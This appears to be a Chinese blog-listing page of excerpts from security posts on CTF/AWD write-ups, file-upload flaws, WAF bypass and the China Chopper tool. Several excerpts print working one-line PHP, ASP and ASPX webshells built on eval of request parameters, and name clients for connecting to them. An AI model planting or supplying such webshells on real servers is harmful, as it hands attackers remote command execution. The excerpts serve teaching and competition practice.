北极星杯 awd复现 服务器共有3个web和一个pwn web1 1,down下web1的源码,使用D盾扫描: 2,漏洞1:发现三个冰蝎的木马,和一个一句话木马 冰蝎的后门需要使用冰蝎的客户端进行连接:如图: 一句话木马直接使用菜刀或蚁剑连接即可: 3,漏洞2:sqlhelper.php的反序列化漏 ...
分类:
其他好文 时间:
2019-10-26 01:43:55
阅读次数:
194
PHP-WebShell-Bypass-WAF PHP WebShell 一句话的结构是:输入和执行,这是经典的PHP 一句话代码: <?php eval($_GET['test']); ?> <?php eval($_POST['test']); ?> WebShell 的输入点在$_GET 和$ ...
分类:
Web程序 时间:
2019-10-20 11:10:22
阅读次数:
121
今天看到的文章,特地记录,非常的好,关于取反操作,之前记录过一篇无字幕webshell,suctf中也有类似题目 ...
分类:
Web程序 时间:
2019-10-19 23:28:08
阅读次数:
506
看起来是个上传题,提示只能上传图片,这时候就需要拿出我们的一句话来了。 首先来试试水,上传一个一句话木马,使用burp抓包,修改content-type为image/jpeg 上传失败,可能是对文件进行了过滤,让我们来绕过试一下 试了很多招数都不行,只能看下大佬们的wp 原来这个题是对文件类型进行了 ...
分类:
系统相关 时间:
2019-10-19 11:23:35
阅读次数:
133
韩舒学姐(相当温柔)今天给我们讲解了文件上传漏洞,以及Anrwsord和Cknife等工具的使用。文件上传漏洞上传的文件不进行限制,有可能会被利用于上传可执行文件、脚本到服务器上,并且通过脚本文件可以获得执行服务器端命令的能力木马根据语言分类,有PHP、ASP、JSP、ASP.NET等不同语言下的木... ...
分类:
Web程序 时间:
2019-10-11 23:23:21
阅读次数:
264
如果发现一个站点用的是wordpress管理系统的话, 可以试试默认的后台地址:/wp-admin/ 访问后自动跳转置 后台登录界面 用户名收集 :/wp-admin/?author=1 依次访问/author=1 ,2,3,4,5 …. 直到结束 进入后台再尝试写入一句话木马 利用kali中的工具 ...
分类:
其他好文 时间:
2019-09-22 19:41:35
阅读次数:
101
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来: 二、编码的替换的类型: 三、其他类型: 四、下载类型: 五、无关键函数类型: 六、补充知识点: SQL写一句话(MySQL): ...
分类:
数据库 时间:
2019-09-11 17:47:50
阅读次数:
180
中国菜刀的由来: 说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/PHP/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页 ...
分类:
其他好文 时间:
2019-08-31 21:34:03
阅读次数:
549
php <?php @eval($_post['pass']);?> asp <%eval request ("pass")%> aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 防御 代码中过滤。 ...
分类:
其他好文 时间:
2019-08-17 17:48:05
阅读次数:
112
Web for pentester_writeup之File Upload篇 File Upload(文件上传) Example 1 直接上传一句话木马,使用蚁剑连接 成功连接,获取网站根目录 Example 2 可以看到上传文件做了相关限制,不允许上传PHP文件, 修改后缀名为linux不识别的x ...
分类:
Web程序 时间:
2019-08-08 19:16:58
阅读次数:
144
